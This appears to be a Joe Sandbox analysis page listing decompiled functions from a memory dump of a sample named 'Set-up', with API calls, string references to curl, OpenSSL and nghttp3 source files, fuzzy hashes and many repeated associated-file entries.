Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_get_uint
API String ID: 1297977491-1187682564
Opcode ID: 505bf827b19fef9072689f70cf12430cbcd0f3941acd92c28e0cfce76dc367e2
Instruction ID: 3945f2c8a2e8104eb97d18b92d90673b81a4541c9440630d3b525c30c17b90d7
Opcode Fuzzy Hash: 505bf827b19fef9072689f70cf12430cbcd0f3941acd92c28e0cfce76dc367e2
Instruction Fuzzy Hash: D9215776B4C3407BD13536A9BC03F6F674DCBC4B24F180835F7096A2C3EA92AD1542A0

Function 009E2240 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,009E2BF4,00000008), ref: 009E22C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,009E2BF4,00000008), ref: 009E2312

Strings

copy_integer, xrefs: 009E228B
general_set_uint, xrefs: 009E22D2
crypto/params.c, xrefs: 009E2295, 009E22DC

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_set_uint
API String ID: 1297977491-3191580373
Opcode ID: 64bd6284c88d39b7fe8af4ba09bea0aded4b374f1402db95aaae9614537eb27d
Instruction ID: e6c7bdc5cc65b595b6726ecf73750fc64980c8c7876a23629be468aee035175c
Opcode Fuzzy Hash: 64bd6284c88d39b7fe8af4ba09bea0aded4b374f1402db95aaae9614537eb27d
Instruction Fuzzy Hash: 992149717083806BDB3A67A9AC42F3A778C9BD4B14F18192DF6569A383E595AC404271

Function 009E40A0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,009E2075,?,?,?,?,?,?,009E2704,00000008), ref: 009E40C1

Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,009E2075,?,?,?,?,?,?,009E2704,00000008), ref: 009E411E

Strings

copy_integer, xrefs: 009E4134
unsigned_from_signed, xrefs: 009E40D3
crypto/params.c, xrefs: 009E40DD, 009E413E

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$unsigned_from_signed
API String ID: 2323844366-3781254518
Opcode ID: 06c6eb434827f37625f978e4483a87cbc62b0c63a2e567f4a3affec96df167bd
Instruction ID: b4a3c73a032be52a6b84f96aca57f658d8d4457ee9ba6e2f9a5d44a99298e16a
Opcode Fuzzy Hash: 06c6eb434827f37625f978e4483a87cbc62b0c63a2e567f4a3affec96df167bd
Instruction Fuzzy Hash: EE01F961B4C3503BD63176A56C03F6B6A48CBE1B15F180974F644A61C3E6D66C5442B1

Function 008AE600 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00D0C27C,nghttp3_qpack.c,00000811,?,?), ref: 008AE866
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,008B077F,?,?,00000000,00000000), ref: 008AE87B

Strings

space <= ctx->max_dtable_capacity, xrefs: 008AE876
nghttp3_qpack.c, xrefs: 008AE85C, 008AE871

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
API String ID: 1222420520-1270044496
Opcode ID: fa12d0202ccd2b2e18e69982f9e56b9227629858efbb12899ea651cb38b8f2a6
Instruction ID: eaf7c53e320eee02c3f5ec1e5c7a83ad7ece114dd7b53bc4c2a0fe02b3a9c473
Opcode Fuzzy Hash: fa12d0202ccd2b2e18e69982f9e56b9227629858efbb12899ea651cb38b8f2a6
Instruction Fuzzy Hash: 7581A575A006019FE710DF28D842A26B7F1FF56318F184A2CE84AD7B52E735F865CB92

Function 008081B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150stringCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(008054E6), ref: 00808235
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 008082D4
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 008082E1

Strings

mime.c, xrefs: 0080824C, 008082B8, 0080832D, 00808342, 0080835E, 0080837A, 0080839C

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strrchr$_stat64
String ID: mime.c
API String ID: 2771713950-3378952128
Opcode ID: dbfbfd7c3540c52546329d27afc6f9e7deab7f77602c6e8de5200f802478b29b
Instruction ID: af5acaf7426e1f0defb0f7b1202ca0d00f31d177fc826c08aa853e1a939ea916
Opcode Fuzzy Hash: dbfbfd7c3540c52546329d27afc6f9e7deab7f77602c6e8de5200f802478b29b
Instruction Fuzzy Hash: 0251D0B1A00300DBEB509E18CC8276A3A94FF80B14F050178FD48DF3C6EBB5D9449B92

Function 00844380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111stringnetworkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 008443D8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00844409
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00844457

Strings

curl_addrinfo.c, xrefs: 00844429, 008444C3

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: htonsmemcpystrlen
String ID: curl_addrinfo.c
API String ID: 2973076469-1838508774
Opcode ID: e51e3ad7a6abe42051b861dab44609c04f6653912a43b009b5032ba53accce18
Instruction ID: bd6e60f81ead183f3ef14e27109b588dad7396910e9eaccf578e8ff6795ee214
Opcode Fuzzy Hash: e51e3ad7a6abe42051b861dab44609c04f6653912a43b009b5032ba53accce18
Instruction Fuzzy Hash: 844173B5A04749AFD7009F59C880B6AB7E4FF88314F048969ED89CB361E331E994CB91

Function 00836650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 0083665D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0083670E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 0083671C

Strings

altsvc.c, xrefs: 00836699, 008366AB, 008366BD

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen$_time64
String ID: altsvc.c
API String ID: 2413861649-3234676706
Opcode ID: d891e5dbf6641bb7aa55ccb574f375189dfd8968a63699c0cd8083aa0a1a009b
Instruction ID: 1c64d26505a54124fd9a8e3ce1ffc8a39b437769973f7fc59e10e4079f82f024
Opcode Fuzzy Hash: d891e5dbf6641bb7aa55ccb574f375189dfd8968a63699c0cd8083aa0a1a009b
Instruction Fuzzy Hash: CC3185B1E083007BD750AE68AC8292B77D4FB94754F448538F949D6292F671ED24C693

Function 008A42E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 008A435F
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 008A43EF

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 008A435A, 008A43EA
nghttp3_conn.c, xrefs: 008A4355, 008A43E5

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 688a4c133045e413a588c51b31e504619a3a3fef63f6aa39ed4021a470c5bae0
Instruction ID: 4d9d3d4d413f9f76031a891ad1804d815977d81fdbeda659394f81590c4929c9
Opcode Fuzzy Hash: 688a4c133045e413a588c51b31e504619a3a3fef63f6aa39ed4021a470c5bae0
Instruction Fuzzy Hash: 6F31B672504205AFEB119F58EC05F9A37A9FF86319F0904B4E814DB6A3E776D428C762

Function 008AA090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,008A70DF,00000001,?,?,?), ref: 008AA0E5

Part of subcall function 008AA140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 008AA29A

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,008A70DF,00000001,?,?,?), ref: 008AA135

Strings

nghttp3_ksl.c, xrefs: 008AA12B
ksl->head, xrefs: 008AA130

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assertmemcpymemmove
String ID: ksl->head$nghttp3_ksl.c
API String ID: 374949274-2784241221
Opcode ID: cba67fc0028e9b85f5ec22e5afa0334937e028faf317be7053939c8e25f15bde
Instruction ID: 38f8a4abc6681bb4cfb70f7039917e3fc98ada3af6c1356bfcfa44cef694aa55
Opcode Fuzzy Hash: cba67fc0028e9b85f5ec22e5afa0334937e028faf317be7053939c8e25f15bde
Instruction Fuzzy Hash: 5711B970204204EFDB189F04D88195AF7A6FF86314F58C55EE90A8BE41D330DC44CBA1

Function 008388C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

getsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0083893B
setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00838960

Part of subcall function 00827620: GetModuleHandleA.KERNEL32(ntdll), ref: 0082763F
Part of subcall function 00827620: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 0082764B
Part of subcall function 00827620: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,0000010C), ref: 00827695
Part of subcall function 00827620: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 008276D3
Part of subcall function 00827620: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 008276DA
Part of subcall function 00827620: VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 008276E4
Part of subcall function 00827620: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 008276EB
Part of subcall function 00827620: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 008276FC

Strings

@, xrefs: 00838945
@, xrefs: 008388C4

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ConditionMask$AddressHandleModuleProcgetsockoptmemsetsetsockopt
String ID: @$ @
API String ID: 2103437208-1089145642
Opcode ID: 9f9e8be776bdb5dde0119da2e1f6d1b14926adba6ba5a0dd73416e9d38016584
Instruction ID: 0aa4a7a93a62aba68f4ee24961a6879576ae645b28f04c966544eaee7c933875
Opcode Fuzzy Hash: 9f9e8be776bdb5dde0119da2e1f6d1b14926adba6ba5a0dd73416e9d38016584
Instruction Fuzzy Hash: 010180B05083469BEB109F14FD4A7BA7BE5FF81305F014428FA84A6291E7B58AC9C683

Function 00928970 Relevance: 6.7, APIs: 5, Instructions: 425COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,FFC0BFFA,?), ref: 00928A9A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000001,?,?), ref: 00928AEA
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00928BD7
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00928C2B
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00928E63

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 01b0f0ed74a19b394c754add869bcac2cf7de35f228560ebc2e285918c140d4e
Instruction ID: cc6134d6fa4a8e6f34a56b3dfa07f23feb654a41cf2a45951e03ffa8a6f88879
Opcode Fuzzy Hash: 01b0f0ed74a19b394c754add869bcac2cf7de35f228560ebc2e285918c140d4e
Instruction Fuzzy Hash: 3AF1CFB1A02621CFDB18CF18E59475ABBE6FF94310F18C56DE8498B399DB34E844CB90

Function 0082C5F0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 275COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0082C685

Part of subcall function 008073F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0080CA95,00CEAB98,00000467,mprintf.c), ref: 0080741D
Part of subcall function 008073F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00807445

Part of subcall function 008073F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,0080CA95,00CEAB98,00000467,mprintf.c), ref: 00807486
Part of subcall function 008073F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 008074AA
Part of subcall function 008073F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 008074B2

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0082C6CF
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0082C719

Strings

vtls/vtls.c, xrefs: 0082C653, 0082C69D, 0082C6E7, 0082C72E, 0082C756, 0082C77F, 0082C7A8, 0082C7D1, 0082C7FA, 0082C823, 0082C84C, 0082C875, 0082C935, 0082C95F

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
